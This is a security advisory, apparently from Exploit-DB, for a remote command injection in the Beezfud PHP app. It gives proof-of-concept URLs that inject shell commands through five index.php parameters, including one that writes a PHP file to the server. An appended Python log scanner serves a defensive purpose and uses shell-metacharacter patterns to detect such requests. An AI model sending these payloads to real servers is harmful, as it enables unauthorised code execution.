Beezfud – Remote Code Execution

  • Author: Ashiyane Digital Security Team
    Date: 2015-12-24
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/39093/
  • ================================================================================
    # Beezfud Remote Code Execution
    ================================================================================
    # Vendor Homepage: https://github.com/EVA-01/beezfud
    # Date: 23/12/2015
    # Software Link: https://github.com/EVA-01/beezfud/archive/master.zip
    # Author: Ashiyane Digital Security Team
    # Contact: hehsan979@gmail.com
    # Source: http://ehsansec.ir/advisories/beezfud-exec.txt
    ================================================================================
    # Vulnerable File : index.php
    
    # PoC :
    
    http://localhost/beezfud/index.php?parameter=;Command;
    
    Vulnerable Parameters: lookback, max, range, latest, earliest
    
    
    Example :
    
    http://localhost/beezfud/index.php?lookback=;echo '<?php phpinfo();
    ?>' >info.php;
    
    ================================================================================
    # Discovered By : Ehsan Hosseini (EhsanSec.ir)
    ================================================================================
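
Added example (not part of the original advisory or of the Beezfud project): a Python check for web access logs that flags requests to index.php in which one of the five parameters named above carries shell metacharacters after URL decoding. The combined log format, the sample lines and the metacharacter set are assumptions made for the illustration.

```python
import re
from urllib.parse import unquote_plus

# Parameters the advisory lists as injectable in index.php.
VULN_PARAMS = {"lookback", "max", "range", "latest", "earliest"}
# Shell metacharacters to flag (assumed deny-list, used for detection only).
SHELL_META = re.compile(r"[;|&`$<>\\\r\n]")
# Request target of a combined-format access log line; the target may
# contain raw spaces when the client did not URL-encode the value.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (.+?) HTTP/[\d.]+"')

# Constructed sample log lines (addresses from the documentation range).
SAMPLE_LOG = [
    '203.0.113.5 - - [24/Dec/2015:10:00:00 +0000] "GET /beezfud/index.php?lookback=7&max=20 HTTP/1.1" 200 512',
    '203.0.113.9 - - [24/Dec/2015:10:01:00 +0000] "GET /beezfud/index.php?lookback=%3BCommand%3B HTTP/1.1" 200 512',
    '203.0.113.9 - - [24/Dec/2015:10:02:00 +0000] "GET /beezfud/index.php?max=5&range=;Command; HTTP/1.1" 200 512',
    '203.0.113.7 - - [24/Dec/2015:10:03:00 +0000] "GET /beezfud/index.php?q=a;b HTTP/1.1" 200 512',
]

def suspicious_params(log_line):
    """Return [(param, decoded_value)] for flagged parameters in one log line."""
    match = REQUEST.search(log_line)
    if not match:
        return []
    path, _, query = match.group(1).partition("?")
    if not path.endswith("/index.php"):
        return []
    hits = []
    # Split on "&" only: treating ";" as a separator would hide the payload.
    for pair in query.split("&"):
        name, _, raw = pair.partition("=")
        name, value = unquote_plus(name), unquote_plus(raw)
        if name in VULN_PARAMS and SHELL_META.search(value):
            hits.append((name, value))
    return hits

def scan(lines):
    """Return {line_number: hits} for every line with at least one hit."""
    report = {}
    for number, line in enumerate(lines, start=1):
        hits = suspicious_params(line)
        if hits:
            report[number] = hits
    return report

if __name__ == "__main__":
    for number, hits in scan(SAMPLE_LOG).items():
        print(number, hits)
```

Values are decoded once, as the web server would decode them, so both the encoded and the raw form of the same request are reported.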